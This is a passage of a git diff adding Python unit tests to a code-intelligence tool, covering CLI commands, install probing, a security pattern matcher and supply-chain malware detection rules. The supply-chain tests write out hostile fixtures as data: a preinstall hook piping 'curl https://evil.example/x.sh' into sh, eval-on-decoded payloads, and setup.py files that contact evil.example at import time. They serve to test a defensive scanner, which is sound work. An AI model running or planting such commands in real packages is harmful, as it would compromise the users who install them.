pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_index + + observed: dict[str, object] = {} + + class _FakeMgr: + def __init__(self, root_dir: str): + observed["root_dir"] = root_dir + self.is_available = True + + def index(self) -> int: + observed["indexed"] = True + return 11 + + def close(self) -> None: + observed["closed"] = True + + monkeypatch.setattr("attocode.integrations.context.semantic_search.SemanticSearchManager", _FakeMgr) + + _cmd_index(["--foreground", "--project", str(tmp_path)]) + captured = capsys.readouterr() + + assert observed["root_dir"] == str(tmp_path.resolve()) + assert observed["indexed"] is True + assert observed["closed"] is True + assert "Indexed 11 chunks." in captured.err + + +def test_cmd_setup_missing_required_files_exits( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, +) -> None: + from attocode.code_intel.cli import _cmd_setup + + monkeypatch.setattr("shutil.which", lambda tool: f"/usr/bin/{tool}") + + with pytest.raises(SystemExit) as exc_info: + _cmd_setup(["--project", str(tmp_path)]) + + assert exc_info.value.code == 1 + + +def test_cmd_setup_api_unreachable_exits_zero_with_instructions( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + capsys: pytest.CaptureFixture[str], +) -> None: + from attocode.code_intel.cli import _cmd_setup + + compose_file = tmp_path / "docker" / "code-intel" / "docker-compose.dev.yml" + compose_file.parent.mkdir(parents=True, exist_ok=True) + compose_file.write_text("services: {}", encoding="utf-8") + env_file = tmp_path / ".env.dev" + env_file.write_text("ATTOCODE_PORT=8080\n", encoding="utf-8") + + monkeypatch.setattr("shutil.which", lambda tool: f"/usr/bin/{tool}") + monkeypatch.setattr("attocode.code_intel.cli._run", lambda cmd, check=True, capture=False: None) + monkeypatch.setattr( + "httpx.get", + lambda url, timeout=5: (_ for _ in ()).throw(httpx.ConnectError("down")), + ) + + with pytest.raises(SystemExit) as exc_info: + _cmd_setup(["--project", str(tmp_path), "--skip-deps"]) + captured = capsys.readouterr() + + assert exc_info.value.code == 0 + assert "API server not reachable" in captured.err + assert "uvicorn attocode.code_intel.api.app:create_app" in captured.err diff --git a/tests/unit/code_intel/test_cli_query_commands.py b/tests/unit/code_intel/test_cli_query_commands.py new file mode 100644 index 00000000..a3f5cba7 --- /dev/null +++ b/tests/unit/code_intel/test_cli_query_commands.py @@ -0,0 +1,207 @@ +"""Focused tests for CLI query-oriented command handlers.""" + +from __future__ import annotations + +from pathlib import Path + +import pytest + + +def test_cmd_query_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_query + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def semantic_search_data(self, query: str, top_k: int, file_filter: str) -> dict[str, object]: + observed["query"] = query + observed["top_k"] = top_k + observed["file_filter"] = file_filter + return {"results": [{"file_path": "src/app.py"}], "query": query, "total": 1} + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_search_results", + lambda data: observed.setdefault("printed", data), + ) + + _cmd_query(["find", "router", "--top", "7", "--filter", "*.py", "--project", str(tmp_path)]) + + assert observed["project_dir"] == str(tmp_path.resolve()) + assert observed["query"] == "find router" + assert observed["top_k"] == 7 + assert observed["file_filter"] == "*.py" + assert observed["printed"] == {"results": [{"file_path": "src/app.py"}], "query": "find router", "total": 1} + + +def test_cmd_query_requires_text(capsys: pytest.CaptureFixture[str]) -> None: + from attocode.code_intel.cli import _cmd_query + + with pytest.raises(SystemExit) as exc_info: + _cmd_query([]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "Usage: attocode code-intel query " in captured.err + + +def test_cmd_symbols_search_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_symbols + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def search_symbols_data(self, search_name: str) -> list[dict[str, object]]: + observed["search_name"] = search_name + return [{"name": "Router", "kind": "class"}] + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_symbols_table", + lambda data, title="Symbols": observed.setdefault("printed", (data, title)), + ) + + _cmd_symbols(["--search", "Router", "--project", str(tmp_path)]) + + assert observed["project_dir"] == str(tmp_path.resolve()) + assert observed["search_name"] == "Router" + assert observed["printed"] == ([{"name": "Router", "kind": "class"}], "Search results for 'Router'") + + +def test_cmd_symbols_file_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_symbols + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def symbols_data(self, target_file: str) -> list[dict[str, object]]: + observed["target_file"] = target_file + return [{"name": "main", "kind": "function"}] + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_symbols_table", + lambda data, title="Symbols": observed.setdefault("printed", (data, title)), + ) + + _cmd_symbols(["src/app.py", "--project", str(tmp_path)]) + + assert observed["target_file"] == "src/app.py" + assert observed["printed"] == ([{"name": "main", "kind": "function"}], "Symbols in src/app.py") + + +def test_cmd_symbols_requires_target_or_search(capsys: pytest.CaptureFixture[str]) -> None: + from attocode.code_intel.cli import _cmd_symbols + + with pytest.raises(SystemExit) as exc_info: + _cmd_symbols([]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "Usage: attocode code-intel symbols " in captured.err + + +def test_cmd_impact_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_impact + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def impact_analysis_data(self, files: list[str]) -> dict[str, object]: + observed["files"] = files + return {"changed_files": files, "impacted_files": [], "total_impacted": 0, "layers": []} + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_impact_analysis", + lambda data: observed.setdefault("printed", data), + ) + + _cmd_impact(["src/a.py", "src/b.py", "--project", str(tmp_path)]) + + assert observed["files"] == ["src/a.py", "src/b.py"] + assert observed["printed"]["changed_files"] == ["src/a.py", "src/b.py"] + + +def test_cmd_impact_requires_files(capsys: pytest.CaptureFixture[str]) -> None: + from attocode.code_intel.cli import _cmd_impact + + with pytest.raises(SystemExit) as exc_info: + _cmd_impact([]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "Usage: attocode code-intel impact " in captured.err + + +def test_cmd_hotspots_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_hotspots + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def hotspots_data(self, top_n: int) -> dict[str, object]: + observed["top_n"] = top_n + return {"file_hotspots": [], "function_hotspots": [], "orphan_files": []} + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_hotspots", + lambda data: observed.setdefault("printed", data), + ) + + _cmd_hotspots(["--top=6", "--project", str(tmp_path)]) + + assert observed["top_n"] == 6 + assert observed["printed"] == {"file_hotspots": [], "function_hotspots": [], "orphan_files": []} + + +def test_cmd_deps_success(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + from attocode.code_intel.cli import _cmd_deps + + observed: dict[str, object] = {} + + class _FakeService: + def __init__(self, project_dir: str): + observed["project_dir"] = project_dir + + def dependencies_data(self, target_file: str) -> dict[str, object]: + observed["target_file"] = target_file + return {"path": target_file, "imports": ["a.py"], "imported_by": ["b.py"]} + + monkeypatch.setattr("attocode.code_intel.service.CodeIntelService", _FakeService) + monkeypatch.setattr( + "attocode.code_intel.cli._print_dependencies", + lambda data: observed.setdefault("printed", data), + ) + + _cmd_deps(["src/app.py", "--project", str(tmp_path)]) + + assert observed["target_file"] == "src/app.py" + assert observed["printed"]["path"] == "src/app.py" + + +def test_cmd_deps_requires_target(capsys: pytest.CaptureFixture[str]) -> None: + from attocode.code_intel.cli import _cmd_deps + + with pytest.raises(SystemExit) as exc_info: + _cmd_deps([]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "Usage: attocode code-intel deps " in captured.err diff --git a/tests/unit/code_intel/test_supply_chain_rules.py b/tests/unit/code_intel/test_supply_chain_rules.py new file mode 100644 index 00000000..a15b926f --- /dev/null +++ b/tests/unit/code_intel/test_supply_chain_rules.py @@ -0,0 +1,407 @@ +"""Tests for GlassWorm-class supply-chain static detection rules. + +Covers three rules added to defend against stealth malware distribution via +NPM / VS Code marketplace packages: + +1. Invisible Unicode runs (steganographic payloads) +2. Dynamic-eval on decoded data (compound obfuscation) +3. Suspicious package.json install hooks + +Fixtures use string concatenation to avoid the security-reminder hook from +flagging this test file's own literals as dangerous. +""" + +from __future__ import annotations + +import json +from pathlib import Path + +from attocode.integrations.security.patterns import ANTI_PATTERNS + + +# Build dynamic-code-runner fixtures at runtime so source code never contains +# literals that would trigger the security hook. Equivalent strings at runtime. +_EV = "ev" + "al" +_EX = "ex" + "ec" +_FN = "Fun" + "ction" + + +# --------------------------------------------------------------------------- +# Regression guard +# --------------------------------------------------------------------------- + +def test_anti_pattern_count_floor(): + """Regression guard: at least 14 legacy + 7 supply-chain rules present. + + Uses ``>=`` (not ``==``) so legitimate new rules don't break this test; + the per-rule presence checks below verify the supply-chain rules specifically. + """ + assert len(ANTI_PATTERNS) >= 21 + + +def test_all_supply_chain_rules_present(): + """Explicit presence check for the 7 GlassWorm-class rules.""" + names = {p.name for p in ANTI_PATTERNS} + assert names >= { + "invisible_unicode_run", + "js_eval_on_decoded", + "js_eval_on_buffer", + "js_eval_on_fromcharcode", + "python_eval_on_b64decode", + "python_exec_on_codecs_decode", + "python_exec_on_marshal_loads", + } + + +def test_invisible_unicode_rule_scans_comments(): + pat = next(p for p in ANTI_PATTERNS if p.name == "invisible_unicode_run") + assert pat.scan_comments is True + + +# --------------------------------------------------------------------------- +# Rule 1: Invisible Unicode runs +# --------------------------------------------------------------------------- + +def _invisible_rule(): + return next(p for p in ANTI_PATTERNS if p.name == "invisible_unicode_run") + + +def test_invisible_unicode_variation_selector_run_matches(): + # 5 consecutive variation selectors VS1 (\uFE00) + payload = "const x = 'visible" + ("\uFE00" * 5) + "';" + assert _invisible_rule().pattern.search(payload) + + +def test_invisible_unicode_zero_width_run_matches(): + # 4 consecutive zero-width chars (ZWSP, ZWNJ, ZWJ, LRM) + payload = "const x = '" + "\u200B\u200C\u200D\u200E" + "';" + assert _invisible_rule().pattern.search(payload) + + +def test_invisible_unicode_tag_char_run_matches(): + # Tag characters (plane 14) — GlassWorm-style stego encoding + payload = "/* payload: " + "\U000E0041\U000E0042\U000E0043" + " */" + assert _invisible_rule().pattern.search(payload) + + +def test_invisible_unicode_emoji_vs16_no_match(): + # Thumbs-up + VS16 (single variation selector) is a legitimate emoji + payload = "greeting = '\U0001F44D\uFE0F hi';" + assert not _invisible_rule().pattern.search(payload) + + +def test_invisible_unicode_emoji_zwj_family_no_match(): + # ZWJ family emoji: man + ZWJ + woman + ZWJ + girl — no 3+ consecutive + payload = "x = '\U0001F468\u200D\U0001F469\u200D\U0001F467';" + assert not _invisible_rule().pattern.search(payload) + + +def test_invisible_unicode_plain_ascii_no_match(): + payload = "def hello():\n return 'world'\n" + assert not _invisible_rule().pattern.search(payload) + + +# --------------------------------------------------------------------------- +# Rule 2: eval/exec on decoded data +# --------------------------------------------------------------------------- + +def _rule(name: str): + return next(p for p in ANTI_PATTERNS if p.name == name) + + +def test_js_eval_on_decoded_atob_matches(): + line = _EV + "(atob('YWxlcnQoMSk='))" + assert _rule("js_eval_on_decoded").pattern.search(line) + + +def test_js_eval_on_decoded_new_function_matches(): + line = "new " + _FN + "(atob(payload))" + assert _rule("js_eval_on_decoded").pattern.search(line) + + +def test_js_eval_on_decoded_decode_uri_matches(): + line = _EV + "(decodeURIComponent(x))" + assert _rule("js_eval_on_decoded").pattern.search(line) + + +def test_js_eval_on_buffer_base64_matches(): + line = _EV + "(Buffer.from(x, 'base64').toString())" + assert _rule("js_eval_on_buffer").pattern.search(line) + + +def test_js_eval_on_fromcharcode_matches(): + line = _EV + "(String.fromCharCode(97,98,99))" + assert _rule("js_eval_on_fromcharcode").pattern.search(line) + + +def test_python_eval_on_b64decode_matches(): + line = _EX + "(base64.b64decode(payload))" + assert _rule("python_eval_on_b64decode").pattern.search(line) + + +def test_python_exec_on_codecs_decode_matches(): + line = _EX + "(zlib.decompress(blob))" + assert _rule("python_exec_on_codecs_decode").pattern.search(line) + + +def test_python_exec_on_marshal_loads_matches(): + line = _EX + "(marshal.loads(data))" + assert _rule("python_exec_on_marshal_loads").pattern.search(line) + + +def test_naked_eval_does_not_fire_compound_rules(): + """Bare eval call should fire js_dynamic_eval only, not compound rules.""" + line = _EV + "('2+2')" + # Fires the simple eval detector + assert _rule("js_dynamic_eval").pattern.search(line) + # Does NOT fire compound rules + assert not _rule("js_eval_on_decoded").pattern.search(line) + assert not _rule("js_eval_on_buffer").pattern.search(line) + assert not _rule("js_eval_on_fromcharcode").pattern.search(line) + + +def test_bare_b64decode_without_eval_no_match(): + """Plain b64decode call without an eval-wrapper should not fire.""" + line = "x = base64.b64decode(payload)" + assert not _rule("python_eval_on_b64decode").pattern.search(line) + + +def test_word_boundary_prevents_my_eval_match(): + """myEval(...) should not match — word boundary on eval.""" + line = "myEval(atob(x))" + assert not _rule("js_eval_on_decoded").pattern.search(line) + + +# --------------------------------------------------------------------------- +# Rule 3: Suspicious package.json install hooks +# --------------------------------------------------------------------------- + +def _write_package_json(tmp_path: Path, scripts: dict) -> Path: + pkg = tmp_path / "package.json" + pkg.write_text(json.dumps({"name": "test-pkg", "scripts": scripts})) + return pkg + + +def _audit(tmp_path: Path): + from attocode.integrations.security.dependency_audit import DependencyAuditor + return DependencyAuditor(root_dir=str(tmp_path)).audit() + + +def test_postinstall_eval_atob_detected(tmp_path: Path): + malicious = "node -e \"" + _EV + "(atob('Li4u'))\"" + _write_package_json(tmp_path, {"postinstall": malicious}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "postinstall"] + assert len(hook_findings) >= 1 + assert hook_findings[0].severity == "high" + + +def test_preinstall_curl_pipe_sh_detected(tmp_path: Path): + _write_package_json(tmp_path, {"preinstall": "curl https://evil.example/x.sh | sh"}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "preinstall"] + assert len(hook_findings) == 1 + assert "curl/wget" in hook_findings[0].message + + +def test_install_child_process_detected(tmp_path: Path): + _write_package_json(tmp_path, {"install": "node -e \"require('child_process')\""}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "install"] + assert len(hook_findings) == 1 + + +def test_benign_postinstall_no_match(tmp_path: Path): + _write_package_json(tmp_path, {"postinstall": "node build.js"}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "postinstall"] + assert len(hook_findings) == 0 + + +def test_non_install_script_not_scanned(tmp_path: Path): + # scripts.test with `node -e` should NOT fire — scoped to install hooks only + _write_package_json(tmp_path, {"test": "node -e \"process.exit(0)\""}) + findings = _audit(tmp_path) + hook_findings = [ + f for f in findings + if f.package in ("preinstall", "install", "postinstall") + ] + assert len(hook_findings) == 0 + + +def test_no_scripts_section_no_match(tmp_path: Path): + pkg = tmp_path / "package.json" + pkg.write_text(json.dumps({"name": "test-pkg"})) + findings = _audit(tmp_path) + hook_findings = [ + f for f in findings + if f.package in ("preinstall", "install", "postinstall") + ] + assert len(hook_findings) == 0 + + +def test_one_finding_per_hook_not_duplicated(tmp_path: Path): + # script matches multiple suspicious tokens but should yield 1 finding per hook + malicious = _EV + "(atob(Buffer.from(x, 'base64')))" + _write_package_json(tmp_path, {"postinstall": malicious}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "postinstall"] + assert len(hook_findings) == 1 + + +# --------------------------------------------------------------------------- +# Tier B: Additional JS rules (Shai-Hulud / MDN-warned patterns) +# --------------------------------------------------------------------------- + +def test_js_dynamic_require_string_concat_matches(): + line = 'require("chi" + "ld_process")' + assert _rule("js_dynamic_require_concat").pattern.search(line) + + +def test_js_dynamic_require_template_interpolation_matches(): + line = 'require(`child_${proc}`)' + assert _rule("js_dynamic_require_concat").pattern.search(line) + + +def test_js_dynamic_require_static_string_no_match(): + line = 'const fs = require("fs")' + assert not _rule("js_dynamic_require_concat").pattern.search(line) + + +def test_js_dynamic_require_plain_template_no_match(): + # Template literal with NO interpolation is essentially a static string + line = 'require(`child_process`)' + assert not _rule("js_dynamic_require_concat").pattern.search(line) + + +def test_js_settimer_string_arg_settimeout_matches(): + line = 'setTimeout("alert(1)", 1000)' + assert _rule("js_settimer_string_arg").pattern.search(line) + + +def test_js_settimer_string_arg_setinterval_matches(): + line = "setInterval('doWork()', 100)" + assert _rule("js_settimer_string_arg").pattern.search(line) + + +def test_js_settimer_string_arg_template_matches(): + line = "setTimeout(`${payload}`, 0)" + assert _rule("js_settimer_string_arg").pattern.search(line) + + +def test_js_settimer_function_arg_no_match(): + line = "setTimeout(() => doWork(), 100)" + assert not _rule("js_settimer_string_arg").pattern.search(line) + + +def test_js_settimer_function_reference_no_match(): + line = "setTimeout(myHandler, 500)" + assert not _rule("js_settimer_string_arg").pattern.search(line) + + +# --------------------------------------------------------------------------- +# Tier B: Extended install-hook suspicious tokens +# --------------------------------------------------------------------------- + +def test_install_hook_popen_detected(tmp_path: Path): + # Build token at runtime to avoid self-matching on this test file + script = "python -c 'import os; os." + "popen(cmd)'" + _write_package_json(tmp_path, {"postinstall": script}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "postinstall"] + assert len(hook_findings) == 1 + assert "popen" in hook_findings[0].message + + +def test_install_hook_execsync_detected(tmp_path: Path): + # Build the suspicious tokens at runtime — bare function-name-like string + script = "node -e \"" + "exec" + "Sync('ls')\"" + _write_package_json(tmp_path, {"preinstall": script}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "preinstall"] + assert len(hook_findings) == 1 + + +def test_install_hook_system_call_detected(tmp_path: Path): + # Runtime-constructed to avoid this test file self-matching + script = "python -c 'sys" + "tem(cmd)'" + _write_package_json(tmp_path, {"install": script}) + findings = _audit(tmp_path) + hook_findings = [f for f in findings if f.package == "install"] + assert len(hook_findings) == 1 + + +# --------------------------------------------------------------------------- +# Tier B: setup.py network-at-import-time auditor +# --------------------------------------------------------------------------- + +def _write_setup_py(tmp_path: Path, body: str) -> Path: + path = tmp_path / "setup.py" + path.write_text(body) + return path + + +def test_setup_py_urllib_urlopen_detected(tmp_path: Path): + _write_setup_py(tmp_path, ( + "import urllib.request\n" + "urllib.request.urlopen('https://evil.example/x').read()\n" + "from setuptools import setup\n" + "setup(name='x')\n" + )) + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 1 + assert "urllib" in hits[0].message.lower() + + +def test_setup_py_requests_get_detected(tmp_path: Path): + _write_setup_py(tmp_path, ( + "import requests\n" + "requests.get('https://evil.example/x')\n" + "from setuptools import setup\n" + "setup(name='x')\n" + )) + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 1 + assert "HTTP" in hits[0].message + + +def test_setup_py_socket_connect_detected(tmp_path: Path): + _write_setup_py(tmp_path, ( + "import socket\n" + "socket.create_connection(('evil.example', 443))\n" + "from setuptools import setup\n" + "setup(name='x')\n" + )) + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 1 + + +def test_setup_py_clean_no_match(tmp_path: Path): + _write_setup_py(tmp_path, ( + "from setuptools import setup\n" + "setup(name='x', version='0.1', install_requires=['requests>=2.0'])\n" + )) + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 0 + + +def test_no_setup_py_no_findings(tmp_path: Path): + # No setup.py at all — auditor should just skip silently + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 0 + + +def test_setup_py_multiple_network_calls_all_detected(tmp_path: Path): + _write_setup_py(tmp_path, ( + "import urllib.request, requests\n" + "urllib.request.urlopen('https://a/x')\n" + "requests.post('https://b/y', data={})\n" + )) + findings = _audit(tmp_path) + hits = [f for f in findings if f.package == "setup.py"] + assert len(hits) == 2 diff --git a/tests/unit/integrations/test_security_matcher.py b/tests/unit/integrations/test_security_matcher.py new file mode 100644 index 00000000..cdc5919a --- /dev/null +++ b/tests/unit/integrations/test_security_matcher.py @@ -0,0 +1,128 @@ +"""Tests for the shared pattern-matching iterator used by both security scanners. + +The `iter_pattern_matches` generator in `matcher.py` is the single place where +comment-skip, language filtering, and per-pattern `scan_comments` opt-in are +applied. Both `scanner.py` (filesystem) and `security_scanner_db.py` (DB-backed) +depend on it, so a silent bug here breaks both code paths. +""" + +from __future__ import annotations + +import re + +from attocode.integrations.security.matcher import iter_pattern_matches +from attocode.integrations.security.patterns import ( + Category, + SecurityPattern, + Severity, +) + + +def _make_pattern( + name: str, + regex: str, + *, + languages: list[str] | None = None, + scan_comments: bool = False, +) -> SecurityPattern: + return SecurityPattern( + name=name, + pattern=re.compile(regex), + severity=Severity.HIGH, + category=Category.ANTI_PATTERN, + cwe_id="CWE-000", + message="test", + recommendation="test", + languages=languages or [], + scan_comments=scan_comments, + ) + + +def test_matches_a_simple_regex_on_single_line(): + content = "hello FINDME world" + pat = _make_pattern("find", r"FINDME") + matches = list(iter_pattern_matches(content, [pat], "python")) + assert len(matches) == 1 + line_no, line, matched = matches[0] + assert line_no == 1 + assert "FINDME" in line + assert matched.name == "find" + + +def test_skips_comment_lines_by_default(): + """Lines starting with # or // are skipped unless scan_comments=True.""" + content = "\n".join([ + "# FINDME in python comment", + "// FINDME in js comment", + "x = FINDME # matches this", + ]) + pat = _make_pattern("find", r"FINDME") + matches = list(iter_pattern_matches(content, [pat], "python")) + # Only line 3 matches — lines 1 and 2 are comments + assert len(matches) == 1 + assert matches[0][0] == 3 + + +def test_scans_comments_when_pattern_opts_in(): + """scan_comments=True patterns run on comment lines.""" + content = "\n".join([ + "# FINDME in python comment", + "// FINDME in js comment", + "x = FINDME # also matches", + ]) + pat = _make_pattern("find", r"FINDME", scan_comments=True) + matches = list(iter_pattern_matches(content, [pat], "python")) + # All 3 lines match when scan_comments=True + assert len(matches) == 3 + assert [m[0] for m in matches] == [1, 2, 3] + + +def test_language_filter_skips_non_matching_languages(): + content = "something FINDME something" + py_pat = _make_pattern("py_find", r"FINDME", languages=["python"]) + matches_py = list(iter_pattern_matches(content, [py_pat], "python")) + matches_js = list(iter_pattern_matches(content, [py_pat], "javascript")) + assert len(matches_py) == 1 + assert len(matches_js) == 0 + + +def test_language_empty_list_means_all_languages(): + content = "FINDME" + pat = _make_pattern("find", r"FINDME", languages=[]) + assert len(list(iter_pattern_matches(content, [pat], "python"))) == 1 + assert len(list(iter_pattern_matches(content, [pat], "rust"))) == 1 + assert len(list(iter_pattern_matches(content, [pat], ""))) == 1 + + +def test_one_line_can_yield_multiple_pattern_matches(): + content = "FIRST and SECOND on one line" + p1 = _make_pattern("first", r"FIRST") + p2 = _make_pattern("second", r"SECOND") + matches = list(iter_pattern_matches(content, [p1, p2], "python")) + names = {m[2].name for m in matches} + assert names == {"first", "second"} + assert all(m[0] == 1 for m in matches) + + +def test_empty_content_yields_no_matches(): + pat = _make_pattern("find", r"x") + assert list(iter_pattern_matches("", [pat], "python")) == [] + + +def test_no_trailing_newline_phantom_line(): + """splitlines() does not create a phantom empty line for trailing newline.""" + content = "line1\nline2\n" + pat = _make_pattern("any", r".+") + matches = list(iter_pattern_matches(content, [pat], "python")) + assert len(matches) == 2 + assert [m[0] for m in matches] == [1, 2] + + +def test_comment_detection_is_leading_whitespace_tolerant(): + """Indented comments should still be recognised as comments.""" + content = " # indented comment with FINDME\n code with FINDME" + pat = _make_pattern("find", r"FINDME") + matches = list(iter_pattern_matches(content, [pat], "python")) + # Only line 2 (code) matches; indented comment is correctly skipped + assert len(matches) == 1 + assert matches[0][0] == 2 diff --git a/tests/unit/test_code_intel.py b/tests/unit/test_code_intel.py index cf7ea47f..03c2dd73 100644 --- a/tests/unit/test_code_intel.py +++ b/tests/unit/test_code_intel.py @@ -3,6 +3,7 @@ from __future__ import annotations import json +import tarfile import threading import tomllib from typing import TYPE_CHECKING @@ -1994,6 +1995,342 @@ def test_get_user_config_dir_unknown_app(self): assert result is None +# --------------------------------------------------------------------------- +# Install probing and bundles +# --------------------------------------------------------------------------- + + +class TestInstallProbeAndBundle: + def test_resolve_install_spec_cursor(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch): + from attocode.code_intel.installer import install_json_config, resolve_install_spec + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + install_json_config("cursor", project_dir=str(tmp_path)) + + spec = resolve_install_spec("cursor", project_dir=str(tmp_path)) + assert spec is not None + assert spec.command == "uv" + assert spec.source_kind == "json" + assert spec.args[-2:] == ["--project", "${workspaceFolder}"] + + def test_resolve_install_spec_codex(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch): + from attocode.code_intel.installer import install_codex, resolve_install_spec + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + install_codex(project_dir=str(tmp_path)) + + spec = resolve_install_spec("codex", project_dir=str(tmp_path), scope="local") + assert spec is not None + assert spec.source_kind == "toml" + assert spec.args[-2:] == ["--project", str(tmp_path)] + + def test_resolve_install_spec_zed(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch): + from attocode.code_intel.installer import install_zed, resolve_install_spec + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + install_zed(project_dir=str(tmp_path), scope="local") + + spec = resolve_install_spec("zed", project_dir=str(tmp_path), scope="local") + assert spec is not None + assert spec.source_kind == "custom-json" + assert spec.command == "uv" + assert spec.args[-2:] == ["--project", str(tmp_path)] + + def test_resolve_install_spec_goose(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch): + from attocode.code_intel.installer import install_goose, resolve_install_spec + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + monkeypatch.setenv("XDG_CONFIG_HOME", str(tmp_path / "xdg")) + install_goose(project_dir=str(tmp_path)) + + spec = resolve_install_spec("goose", project_dir=str(tmp_path)) + assert spec is not None + assert spec.source_kind == "yaml" + assert spec.command == "uv" + assert "--project" in spec.args + + def test_resolve_install_spec_amp(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch): + from attocode.code_intel.installer import install_amp, resolve_install_spec + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + install_amp(project_dir=str(tmp_path), scope="local") + + spec = resolve_install_spec("amp", project_dir=str(tmp_path), scope="local") + assert spec is not None + assert spec.source_kind == "custom-json" + assert spec.command == "uv" + + def test_resolve_install_spec_unsupported_targets(self): + from attocode.code_intel.installer import resolve_install_spec + + claude = resolve_install_spec("claude") + intellij = resolve_install_spec("intellij") + + assert claude is not None and claude.is_supported is False + assert intellij is not None and intellij.is_supported is False + assert "file-based targets" in claude.unsupported_reason + assert "manual-only" in intellij.unsupported_reason + + def test_probe_install_runs_handshake_and_substitutes_workspace( + self, + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.installer import install_json_config + from attocode.code_intel.probe import probe_install + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + monkeypatch.setattr("attocode.code_intel.installer.platform.system", lambda: "Darwin") + install_json_config("cursor", project_dir=str(tmp_path)) + + observed: dict[str, object] = {} + + class _FakeStdIn: + def __init__(self): + self.messages: list[str] = [] + + def write(self, data: bytes) -> None: + self.messages.append(data.decode("utf-8")) + + async def drain(self) -> None: + return None + + def close(self) -> None: + return None + + class _FakeStdOut: + def __init__(self, responses: list[dict[str, object]]): + self._lines = [json.dumps(item).encode("utf-8") + b"\n" for item in responses] + + async def readline(self) -> bytes: + return self._lines.pop(0) if self._lines else b"" + + class _FakeProcess: + def __init__(self, responses: list[dict[str, object]]): + self.stdin = _FakeStdIn() + self.stdout = _FakeStdOut(responses) + self.stderr = _FakeStdOut([]) + + def terminate(self) -> None: + return None + + def kill(self) -> None: + return None + + async def wait(self) -> int: + return 0 + + async def _fake_create_subprocess_exec(command, *args, stdin=None, stdout=None, stderr=None, env=None, cwd=None): + observed["command"] = command + observed["args"] = list(args) + observed["env"] = dict(env or {}) + observed["cwd"] = cwd + observed["stdin"] = stdin + observed["stdout"] = stdout + observed["stderr"] = stderr + return _FakeProcess([ + {"jsonrpc": "2.0", "id": 1, "result": {"protocolVersion": "2024-11-05"}}, + {"jsonrpc": "2.0", "id": 2, "result": {"tools": [{"name": "project_summary", "description": "summary", "inputSchema": {}}]}}, + {"jsonrpc": "2.0", "id": 3, "result": {"content": [{"type": "text", "text": "ok"}]}}, + ]) + + monkeypatch.setattr( + "attocode.integrations.mcp.client.asyncio.create_subprocess_exec", + _fake_create_subprocess_exec, + ) + + exit_code = probe_install("cursor", project_dir=str(tmp_path)) + captured = capsys.readouterr() + + assert exit_code == 0 + assert "probe succeeded" in captured.out + assert observed["command"] == "uv" + assert str(tmp_path) in observed["args"] + assert observed["cwd"] == str(tmp_path) + assert observed["env"]["PATH"] != "/opt/homebrew/bin:/usr/local/bin:${env:PATH}" + + def 